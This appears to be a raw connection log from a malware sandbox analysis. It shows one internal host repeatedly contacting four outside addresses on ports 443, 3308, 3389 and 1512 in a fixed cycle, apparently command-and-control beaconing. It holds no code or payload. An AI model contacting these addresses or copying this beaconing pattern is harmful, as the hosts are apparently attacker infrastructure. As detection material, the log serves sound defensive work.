Jan 12, 2021 07:44:51.831612110 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.843430996 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.898345947 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:51.898672104 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.909260035 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.909519911 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.961812973 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:51.961970091 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:51.998970032 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:52.014482975 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:52.132895947 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:52.132941008 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:52.133279085 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:52.139056921 CET	49312	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:52.191370964 CET	443	49312	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:52.261814117 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.305254936 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.305372953 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.306874990 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.350261927 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.360505104 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.360527039 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.360596895 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.378384113 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.423994064 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.424242020 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.434293032 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.434456110 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.477545977 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.477653027 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.517334938 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.520734072 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.520781994 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.633558035 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.633625031 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.633646011 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.633672953 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.635782003 CET	49313	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:52.679070950 CET	3308	49313	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:52.738483906 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:52.793091059 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:52.793204069 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:52.794786930 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:52.849548101 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:52.866560936 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:52.866621971 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:52.866760015 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:52.879256964 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:52.944922924 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:52.945260048 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:52.955373049 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:52.955575943 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:53.010711908 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:53.010812998 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:53.049880981 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:53.065558910 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:53.065612078 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:53.155591965 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:53.155654907 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:53.155886889 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:53.158983946 CET	49314	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:53.213167906 CET	3389	49314	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:53.274110079 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.327265024 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.327389956 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.329226971 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.382344007 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.389080048 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.389132977 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.389204025 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.389229059 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.403124094 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.457354069 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.457700968 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.467644930 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.467957020 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.521003008 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.521370888 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.557719946 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.574608088 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.574672937 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.678571939 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.678612947 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.678942919 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.684639931 CET	49315	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:53.737725973 CET	1512	49315	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:53.804445028 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:53.856583118 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:53.856749058 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:53.857609987 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:53.909518957 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:53.924520969 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:53.924717903 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:53.938158989 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:53.992906094 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:53.993212938 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:54.003437996 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:54.003806114 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:54.055836916 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:54.056011915 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:54.108098030 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:54.226128101 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:54.226161957 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:54.226422071 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:54.232141018 CET	49316	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:54.284252882 CET	443	49316	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:54.350409985 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.393702030 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.393883944 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.394989014 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.438263893 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.448858976 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.448925972 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.448987007 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.449090958 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.462851048 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.507703066 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.507860899 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.517975092 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.518176079 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.561312914 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.561511993 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.601789951 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.604633093 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.604700089 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.717202902 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.717261076 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.717497110 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.720604897 CET	49317	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:54.763667107 CET	3308	49317	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:54.830651045 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:54.884798050 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:54.884885073 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:54.892241001 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:54.947066069 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:54.985879898 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:54.985944986 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:54.985975981 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:54.986023903 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:54.992086887 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:55.057292938 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:55.057642937 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:55.067815065 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:55.068074942 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:55.122611046 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:55.122695923 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:55.162046909 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:55.177583933 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:55.177628040 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:55.268663883 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:55.268712044 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:55.269108057 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:55.274808884 CET	49318	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:55.329601049 CET	3389	49318	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:55.393244028 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.446178913 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.446293116 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.447810888 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.500437021 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.507565975 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.507638931 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.507673979 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.507711887 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.524060011 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.578056097 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.578283072 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.587598085 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.587733030 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.640604973 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.641774893 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.677577972 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.694559097 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.694587946 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.793299913 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.793323994 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.793513060 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.799139977 CET	49319	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:55.852197886 CET	1512	49319	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:55.910367012 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:55.962342024 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:55.962486029 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:55.963921070 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.015469074 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.032154083 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.032313108 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.046930075 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.101185083 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.101309061 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.110779047 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.111053944 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.162602901 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.162756920 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.202884912 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.214427948 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.333496094 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.333544016 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.333790064 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.339653015 CET	49320	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:56.391459942 CET	443	49320	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:56.482465982 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.525708914 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.525964022 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.527678967 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.570768118 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.583400965 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.583446026 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.583564043 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.583626986 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.601794958 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.646837950 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.647229910 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.657527924 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.657792091 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.700825930 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.700953007 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.741835117 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.744060040 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.744086027 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.856525898 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.856544018 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.856981993 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.862704039 CET	49321	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:56.905977011 CET	3308	49321	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:56.986457109 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.040810108 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.041009903 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.042973042 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.097362041 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.128392935 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.128422022 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.128504038 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.141298056 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.202022076 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.202095032 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.206871033 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.206971884 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.261318922 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.261394978 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.300812006 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.316121101 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.316142082 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.404911995 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.404928923 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.405153990 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.410835028 CET	49322	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:57.464971066 CET	3389	49322	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:57.533497095 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.586215973 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.586312056 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.588196039 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.640858889 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.647622108 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.647681952 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.647728920 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.647761106 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.665359020 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.719552994 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.719901085 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.729878902 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.729993105 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.782824993 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.783113956 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.821718931 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.836026907 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.936441898 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.936487913 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:57.936700106 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.939604044 CET	49323	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:44:57.992489100 CET	1512	49323	46.105.131.65	192.168.2.22
Jan 12, 2021 07:44:58.046159029 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.098618984 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.098830938 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.100358009 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.152512074 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.167417049 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.167567015 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.185204983 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.240216970 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.240570068 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.251310110 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.251580954 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.303668022 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.304024935 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.342761040 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.356223106 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.473680019 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.473721981 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.473968983 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.479641914 CET	49324	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:44:58.531987906 CET	443	49324	77.220.64.37	192.168.2.22
Jan 12, 2021 07:44:58.593611002 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.636740923 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.636868000 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.637928009 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.680834055 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.691581011 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.691600084 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.691673994 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.703207016 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.748006105 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.748167038 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.753787994 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.753946066 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.796935081 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.797096014 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.840220928 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.951297998 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.951316118 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:58.951497078 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.956113100 CET	49325	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:44:58.999017954 CET	3308	49325	80.86.91.27	192.168.2.22
Jan 12, 2021 07:44:59.080199957 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.134073973 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.134146929 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.135030985 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.188607931 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.202332020 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.202347994 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.202394009 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.213043928 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.275268078 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.275336027 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.280431032 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.280565023 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.334172964 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.334228992 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.374212980 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.388345957 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.388370037 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.478327036 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.478362083 CET	3389	49326	5.100.228.233	192.168.2.22
Jan 12, 2021 07:44:59.478382111 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.478399038 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.480541945 CET	49326	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:44:59.534466982 CET	3389	49326	5.100.228.233	192.168.2.22
